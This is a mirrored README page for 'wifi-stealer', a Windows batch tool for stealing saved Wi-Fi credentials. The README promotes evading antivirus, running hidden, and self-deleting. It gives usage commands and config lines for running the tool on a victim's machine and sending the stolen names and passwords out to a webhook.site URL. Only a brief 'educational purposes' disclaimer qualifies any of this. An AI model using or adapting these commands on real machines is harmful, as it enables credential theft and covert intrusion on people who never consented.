Giter Club home page Giter Club logo

wifi-stealer's Introduction

About

This is a simple batch program to grab Wi-Fi credentials from a local Windows machine.

Features

  • It does not need to be compiled.
  • Runs on any windows machine (7/8.1/10/11).
  • Undetectable by the default Windows Security AV (didn't test other AVs, but it should be also undetectable by them).
  • Exfiltrated cedentials can be sent to a webhook or saved locally to a txt file.
  • The program has the ability to self-delete.
  • To avoid problems caused by special characters, the credentials are also stored in a hexadecimal value (in the form name:password).

Note: When using Webhook.site, please take the expiration of the URLs into consideration.

Usage

There is a wide variety of ways to run the program. You can choose to use it in whatever way suits your needs. But usually, you either run this program on your machine or on a target machine. Here are some examples on how you can use the program:

Running the program on a local machine (yours)

To run the script and save the credentials in the default txt file (this code line sets the default text file: set "credsfile=creds.txt"), simply type:

> WiFi-Stealer.bat

Or you can specify a name for the txt file (or any file type), type this:

> WiFi-Stealer.bat --output "wifi-credentials.txt"

Running the program on the target machine

Usually when running the program on a remote machine (program downloaded and executed by the victim) or on a machine that you gained physical access to, you need a way to retrieve the credentials. This is how you do it:

  • Specify the webhook as an argument: Simply run the program and pass the URL of your webhook as an argument:
> WiFi-Stealer.bat --upload "https://webhook.site/#!/87258b74-93c5-4792-8175-df08c3ffee20"
  • Store the webhook inside the program: If you can't run the program from the command prompt (or to avoid typing the url), ensure to save your webhook's URL in the variable webhook within the program. Another important step is to change the value of the upload variable from 0 to 1. Once the program is executed, you will receive the credentials.
set upload=1

set "webhook=https://webhook.site/#!/87258b74-93c5-4792-8175-df08c3ffee20"
  • Another cool feature is to make the program delete itself when it's done. To do this, you can simply change selfdelete varibale inside the program from 0 to 1.

  • To run the program in stealth (hidden) mode, remove the :: form this line in the program:

::@powershell -window Hidden -command ""   &:: Uncomment if you want to run the program in hidden mode

Screenshots

⚠️ DISCLAIMER

This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.

wifi-stealer's People

Contributors

psi505 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.